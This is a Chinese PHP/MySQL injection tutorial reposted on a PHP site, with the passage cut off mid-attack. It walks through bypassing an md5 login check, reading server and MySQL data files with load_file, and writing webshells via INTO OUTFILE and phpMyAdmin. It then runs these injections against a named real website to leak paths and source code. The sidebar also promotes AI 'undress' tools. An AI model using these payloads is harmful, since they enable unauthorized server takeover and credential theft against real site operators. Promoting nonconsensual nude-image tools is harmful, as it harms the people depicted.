php注入4-php手册-php.cn

Home

php教程

php手册

php注入4

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 21, 2016 am 09:15 AM

20 mysql nbsp php select

4.    md5的恶梦
山东大学的王博士最近可是搞md5搞的红透了，我们也来搞一搞吧，我们比他更爽，不用计算，哈哈。
md5我们是有办法绕过的，但是并不是哪里都可以，php中的md5函数就不能绕过，因为你输入的所有东西都在里面，根本跑不出。可以绕过的是sql语句中的md5。当然别的sql中的函数也是可以绕过的，道理相同哦。
看例子先：
//login.php
......
$query="select * from alphaauthor where UserName=md5($username) and Password= ".$Pw." ";
......
?>
我们直接在浏览器提交
http:/login.php?username=char(97,98)) or 1=1 %23
带入sql语句成为select * from alphaauthor where UserName=md5(char(97,98)) or 1=1 #) and Password= ".$Pw."
记得md5里面放的是字符，因为后面有or 1=2，所以我们随便放了个char(97,98).    Ok，登陆成功了哦！看看，md5在我们面前也没有什么用处。
5.    核心技术，利用php+mysql注入漏洞直接写入webshell。。
直接利用注入得到webshell，这应该是大家都很想的吧，下面就教给你。
这里假设你已经知道了网站所在的物理路径，我这里假设网站路径为c:/apache/htdocs/site。网站的mysql连接信息放在/lib/sql.inc.php里
1）适用于magic_quotes_gpc＝Off
假设我们可以上传图片，或者txt，zip，等其它东西，我们把我们的木马改成
jpg后缀的，上传后路径为/upload/2004091201.jpg
2004091201.jpg中的内容为
好，我们开始http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file( C:/apache/htdocs/site/upload/2004091201.jpg ),4,5,6,7,8,9,10,11%20into%20outfile C:/apache/htdocs/site/shell.php
因为适用了outfile，所以网页显示不正常，但是我们的任务是完成了。
如图28
我们赶快去看看http://localhost/site/shell.php?cmd=dir
如图29

爽否？Webshell我们已经创建成功了。看到最前面的12了没？那就是我们select 1，2所输出的！
2）下面再讲一个适用于magic_quotes_gpc＝On的时候保存webshell的方法哦，显然肯定也能用在于magic_quotes_gpc＝Off的时候啦。
我们直接读他的配置文件，用技巧2介绍的方法
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file(0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870)
,4,5,6,7,8,9,10,11
得到sql.inc.php内容为

好了我们知道了mysql的root密码了，我们找到phpmyadmin的后台
http://localhost/phpmyadmin/
用root密码为空登陆。
如图30
然后我们新建立一个表结构内容如下：

#
# 数据表的结构 `te`
#
CREATE TABLE te (
cmd text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

#
# 导出下面的数据库内容 `te`
#
INSERT INTO te VALUES ( );
Ok，是我们用select * from table into outfile 的时候了
直接在phpmyadmin的sql输入
SELECT * FROM `te` into outfile C:/apache/htdocs/site/cmd1.php ;
如图31

Ok，成功执行，我们去http://localhost/site/cmd1.php?cmd=dir看看效果去
如图32

好爽的一个webshell是吧！哈哈，我也很喜欢。
不过不知道大家有没有发现我们是在magic_quotes_gpc＝On的情况下完成这项工作的，竟然在phpmyadmin里可以不用考虑引号的限制，哈哈，说明什么？说明phpmyadmin太伟大了，这也就是我们在谈magic_quotes_gpc＝On绕过时所卖的那个关子啦！
6.发现没有我们还可以利用update和insert来插入我们的数据，然后来得到我们的webshell哦，还用上面的那个例子，
//reg.php
......
$query = "INSERT INTO members
VALUES( $id , $login , $pass , $email , 2 )" ;
......
?>
我们在email的地方输入
假设我们注册后的id为10
那么我们可以再找到一个可以注入的地方
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,email,4,5,6,7,8,9,10,11%20from%20user%20where%20id=10%20 into%20outfile C:/apache/htdocs/site/test.php
好了，我们又有了我们的wenshell了哦。
7.mysql的跨库查询
大家是不是一直听说mysql不能跨库查询啊，哈哈，今天我将要教大家一个好方法，通过这个方法来实现变相的跨库查询，方法就是通过load_file来直接读出mysql中dat

a文件夹下的文件内容，从而实现变态跨库查询。
举个例子啦
在这之前我们先讲一下mysql的data文件夹下的结构
Data文件夹下有按数据库名生成的文件夹，文件夹下按照表名生成三个后缀为frm,myd,myi的三个文件，例如
Mysql中有alpha数据库，在alpha库中有alphaauthor和alphadb两个表，
Alpha文件夹内容如下图33

其中alphadb.frm放着lphadb表中的数据，alphadb.frm放着表的结构，alphadb.myi中放的内容随mysql的版本不通会有所不同，具体可以自己用记事本打开来判断。
实验开始
假设我们知道有另外的一个数据库yminfo210存在，且存在表user，user中放这admin的信息。
我们
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file( yminfo210/user.myd ),4,5,6,7,8,9,10,11
说明一下，load_file默认所在的目录是mysql下的data目录，所以我们用
load_file( yminfo210/user.myd )，当然load_file( .info210/user.myd )也是一样的，注意的是into outfile的默认路径是在所在的数据库文件夹下。

结果如图34

我们看读出来的内容
舼? admin 698d51a19d8a121ce581499d7b701668 admin@yoursite.comadmin question admin answer http://www.yoursite.com (?靃?KA靃?靃? 127.0.0.1 d|?? aaa 3dbe00a167653a1aaee01d93e77e730e sdf@sd.com sdfasdfsdfa asdfadfasd ?E麷AM麷A 127.0.0.1 222 222222223423
虽然乱码一堆，但是我们还是可以看出用户名是admin，密码是698d51a19d8a121ce581499d7b701668，后面其它的是另外的信息。
通过这种方法我们就实现了曲线跨库，下面的例子中也会提到哦！

说了这么多下面我们来具体的使用一次，这次测试的对象是国内一著名安全类站点――黑白网络
听人家说黑白有漏洞？我们一起去看看吧。
http://www.heibai.net/down/show.php?id=5403%20and%201=1
正常显示。
如图35

http://www.heibai.net/down/show.php?id=5403%20and%201=2
显示不正常。
如图36

好，我们继续
http://www.heibai.net/down/show.php?id=5403%20and%201=1 union select 1
显示结果如下
如图37

注意看图中没有显示程序名，而且还附带了
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in D:\web\heibai\down\show.php on line 45

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\web\heibai\down\global.php on line 578

晕了，网站路径出来了，那可就死定了哦！
我们继续，直到我们猜到
http://www.heibai.net/down/show.php?id=5403%20and%201=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
的时候正常显示了。
如图38

好我们转换语句成为
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
显示如图39

看看简介处显示为12，我们可以猜测此处应该为字符型！
Ok，我们下面看看文件内容先
D:/web/heibai/down/show.php转化成ascii后为
char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,
104,111,119,46,112,104,112)
我们
view-source:http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,
111,119,46,112,104,112)),13,14,15,16,17,18,19
view-source:是指察看源代码，至于为什么用，我们后面将讲到
显示出它的源代码
如图40

因为在show.php中有一句

如果我们直接在浏览器里提交会跳转到list.php
我们发现这句require ("./include/config.inc.php");
好东西，应该放这配置文件，ok继续
d:/web/heibai/down/include/config.inc.php
转化成char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105
,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)
我们输入

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

Assassin's Creed Shadows: Seashell Riddle Solution

3 weeks ago By DDD

What's New in Windows 11 KB5054979 & How to Fix Update Issues

2 weeks ago By DDD

Where to find the Crane Control Keycard in Atomfall

3 weeks ago By DDD

Assassin's Creed Shadows - How To Find The Blacksmith And Unlock Weapon And Armour Customisation

1 months ago By DDD

Roblox: Dead Rails - How To Complete Every Challenge

3 weeks ago By DDD

Hot Tools

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Hot Topics

Where is the login entrance for gmail email?

7612

CakePHP Tutorial

1387

What is the format of the account name of steam

win11 activation key permanent

nyt connections hints and answers

136

Related knowledge

PHP and Python: Comparing Two Popular Programming Languages Apr 14, 2025 am 12:13 AM

PHP and Python each have their own advantages, and choose according to project requirements. 1.PHP is suitable for web development, especially for rapid development and maintenance of websites. 2. Python is suitable for data science, machine learning and artificial intelligence, with concise syntax and suitable for beginners.

PHP's Current Status: A Look at Web Development Trends Apr 13, 2025 am 12:20 AM

PHP remains important in modern web development, especially in content management and e-commerce platforms. 1) PHP has a rich ecosystem and strong framework support, such as Laravel and Symfony. 2) Performance optimization can be achieved through OPcache and Nginx. 3) PHP8.0 introduces JIT compiler to improve performance. 4) Cloud-native applications are deployed through Docker and Kubernetes to improve flexibility and scalability.

PHP: A Key Language for Web Development Apr 13, 2025 am 12:08 AM

PHP is a scripting language widely used on the server side, especially suitable for web development. 1.PHP can embed HTML, process HTTP requests and responses, and supports a variety of databases. 2.PHP is used to generate dynamic web content, process form data, access databases, etc., with strong community support and open source resources. 3. PHP is an interpreted language, and the execution process includes lexical analysis, grammatical analysis, compilation and execution. 4.PHP can be combined with MySQL for advanced applications such as user registration systems. 5. When debugging PHP, you can use functions such as error_reporting() and var_dump(). 6. Optimize PHP code to use caching mechanisms, optimize database queries and use built-in functions. 7

PHP: The Foundation of Many Websites Apr 13, 2025 am 12:07 AM

The reasons why PHP is the preferred technology stack for many websites include its ease of use, strong community support, and widespread use. 1) Easy to learn and use, suitable for beginners. 2) Have a huge developer community and rich resources. 3) Widely used in WordPress, Drupal and other platforms. 4) Integrate tightly with web servers to simplify development deployment.

MySQL's Place: Databases and Programming Apr 13, 2025 am 12:18 AM

MySQL's position in databases and programming is very important. It is an open source relational database management system that is widely used in various application scenarios. 1) MySQL provides efficient data storage, organization and retrieval functions, supporting Web, mobile and enterprise-level systems. 2) It uses a client-server architecture, supports multiple storage engines and index optimization. 3) Basic usages include creating tables and inserting data, and advanced usages involve multi-table JOINs and complex queries. 4) Frequently asked questions such as SQL syntax errors and performance issues can be debugged through the EXPLAIN command and slow query log. 5) Performance optimization methods include rational use of indexes, optimized query and use of caches. Best practices include using transactions and PreparedStatemen

The Enduring Relevance of PHP: Is It Still Alive? Apr 14, 2025 am 12:12 AM

PHP is still dynamic and still occupies an important position in the field of modern programming. 1) PHP's simplicity and powerful community support make it widely used in web development; 2) Its flexibility and stability make it outstanding in handling web forms, database operations and file processing; 3) PHP is constantly evolving and optimizing, suitable for beginners and experienced developers.

PHP vs. Python: Core Features and Functionality Apr 13, 2025 am 12:16 AM

PHP and Python each have their own advantages and are suitable for different scenarios. 1.PHP is suitable for web development and provides built-in web servers and rich function libraries. 2. Python is suitable for data science and machine learning, with concise syntax and a powerful standard library. When choosing, it should be decided based on project requirements.

PHP vs. Other Languages: A Comparison Apr 13, 2025 am 12:19 AM

PHP is suitable for web development, especially in rapid development and processing dynamic content, but is not good at data science and enterprise-level applications. Compared with Python, PHP has more advantages in web development, but is not as good as Python in the field of data science; compared with Java, PHP performs worse in enterprise-level applications, but is more flexible in web development; compared with JavaScript, PHP is more concise in back-end development, but is not as good as JavaScript in front-end development.

See all articles